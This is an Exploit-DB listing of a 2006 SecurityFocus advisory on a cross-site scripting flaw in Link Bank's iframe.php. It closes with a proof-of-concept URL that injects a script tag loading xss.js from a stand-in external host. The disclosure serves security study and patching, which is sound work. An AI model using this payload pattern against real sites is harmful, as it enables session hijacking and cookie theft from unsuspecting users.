Link Bank - 'Iframe.php' Cross-Site Scripting

EDB-ID:

27367


Author:

Retard

Type:

webapps


Platform:

PHP

Date:

2006-03-07


source: https://www.securityfocus.com/bid/17001/info

Link Bank is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before including it in dynamically generated HTML content.

An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks.

http://www.example.com/iframe.php?site=%3C/title%3E%3C/head%3E%3Cscript%20src=http://www.example.com/xss.js%3E%3C/script%3E